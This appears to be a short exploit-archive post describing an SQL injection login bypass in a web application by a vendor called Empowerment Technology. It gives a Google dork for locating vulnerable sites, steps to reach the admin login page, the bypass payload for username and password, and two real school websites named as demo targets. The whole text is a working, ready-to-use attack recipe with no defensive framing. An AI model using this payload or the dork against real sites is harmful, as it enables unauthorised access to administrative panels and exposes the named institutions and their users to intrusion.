####################################################### # Exploit Title : Empowerment Technology SQL Injection # Date : 2018/03/08 # Exploit Author : Unline Security Team # Vendor Homepage : empowermenttech.com # Version : 1.0 # Google Dork : intext:"Designing & Developed By Empowerment Technology" # category : Webapps # Tested on : Windows10 , Firefox ####################################################### [+] POC: 1- Search Google Dork : intext:"Designing & Developed By Empowerment Technology" 2- Open a Target 3- Go to targetdomain/admin/login.php 4- username and password: '=''or' [+] Demo: http://www.shivalikmv.edu.in/admin/login.php http://www.sgpmv.edu.in/admin/login.php # Discovered by : Dark Sword